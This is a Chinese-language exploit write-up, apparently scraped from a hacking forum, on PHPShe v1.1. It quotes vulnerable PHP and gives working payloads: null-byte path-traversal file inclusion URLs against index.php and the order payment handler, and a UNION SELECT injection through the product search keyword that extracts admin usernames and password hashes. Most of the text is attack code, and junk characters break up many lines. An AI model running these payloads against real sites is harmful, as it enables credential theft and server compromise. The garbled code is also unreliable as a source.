phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
; O9 u/ \7 z: F  N: V6 |' K0 K( E4 L/* Phpshe v1.1 Vulnerability
/* ========================
7 L* l; A( a6 |/ Z/* By: : Kn1f3
  h  W+ [% l0 H& C8 `5 o: T' i4 }/* E-Mail : 681796@qq.com
& j) A. a! s# N( T- k+ o/*******************************************************/
0×00 整体大概参数传输

* Z, o4 `' q9 t1 W" M5 x
& \7 W; y" e8 I2 S- p& _5 I
. a+ x! ^# @. A, w3 ], b//common.php
/ j  P! l* b, H. rif (get_magic_quotes_gpc()) {
; [+ ]# {7 G- s: z$ d* y* w!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
& |; R6 S3 E1 ?( Z: k8 j}
$ O6 ~/ P; [4 b( n* j% ?else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
5 a5 j' d$ i  L' T!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
1 e: Q5 V- p( }1 j1 Esession_start();
: U" K& g6 I: ]% t. q5 E1 g. B!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
0 X* z( o- K0 G, s4 y, L4 q( k4 S!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
- T: k8 t- J% t5 c  Q% B- U. V% R
0×01 包含漏洞


//首页文件
% a0 K: m# ?. K& [: i( Y* F<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
  ^, ?+ J0 {( i' F! n& z2 i% y9 E' ~, M& P' ~?>
//common 文件 第15行开始
2 @3 {* o9 s$ l9 J8 M& W) nurl路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
( z+ e4 s  |: z2 ]3 Q1 \2 K$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
6 R+ l0 u! D% T//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

5 v( U% b* P# q$ U1 \3 E$ d 0×02 搜索注入

" Y9 A# y! \5 F; h/ q<code id="code2">

//product.php文件
  T' U: _" v0 j: W2 Z+ y; {% Acase 'list':
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
; h3 |5 ~: D+ ~) h9 T//搜索
  c6 z; r6 _- ~$ R$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
if ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
  q9 b9 j+ K1 y) ], x$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
if ($_g_orderby) {
; R, P9 V2 }+ W. E( ?- s* e$ n$orderby = explode('_', $_g_orderby);
$ T8 `$ V: X; J$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {
$sqlwhere .= " order by `product_id` desc";
}
4 x1 s1 {3 o- c4 {$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
$product_hotlist = product_hotlist();
//当前路径
% r3 M; U9 w1 c5 \! A, ?# H. ?8 H$nowpath = category_path($category_id);
' Z- ^: R* S: G* ]% K$seo = pe_seo($info['category_name']);
! t: M0 M# }2 _% P* sinclude(pe_tpl('product_list.html'));
4 G, O& B% k; D5 f* b//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
//处理条件语句
7 d7 _9 @7 o# d$ a$sqlwhere = $this->_dowhere($where);
) Z2 O4 J/ L( r  a' }return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
/ k" h+ R- l; D; C1 ?7 p

</code>
' U7 t. s+ ]7 D3 P; k, w/ l9 x
0×03 包含漏洞2
, p' v2 Q& M; i! ^! k. b
% ^0 Y* y  j0 M* z* t: o  Z<code id="code3">

//order.php

case 'pay':

5 u0 \) i! E' Z7 t) R$order_id = pe_dbhold($_g_id);

$cache_payway = cache::get('payway');

4 b  B) ?# f+ i  ]. w  ^0 E# Dforeach($cache_payway as $k => $v) {

$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

1 ^3 Z5 q" g& g9 K+ a1 _- G: bif ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

+ I' l0 N% r" ]+ B}

; x/ x1 P7 f: |0 i}

$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

6 ~( a4 F% ]- q3 ]7 F' ?& X!$order['order_id'] && pe_error('订单号错误...');

0 N8 ^8 O0 v. g, C" Qif (isset($_p_pesubmit)) {

1 _% O& l0 K' f; @+ [, f( sif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {

, B# N$ x- P) V+ r& i4 |5 U9 c$order['order_name'] .= "{$v['product_name']};";

6 ~. c1 t3 U; x5 h6 D}

echo '正在为您连接支付网站，请稍后...';

include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

0 U" p, D. L6 w( R4 D" D}//当一切准备好的时候就可以进行"鸡肋包含了"

: v9 o# q6 [. F3 felse {

9 |' P" J1 G, n) Q* bpe_error('支付错误...');

4 V! B4 L- J; I$ a0 f& @" [8 U6 ^}

}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg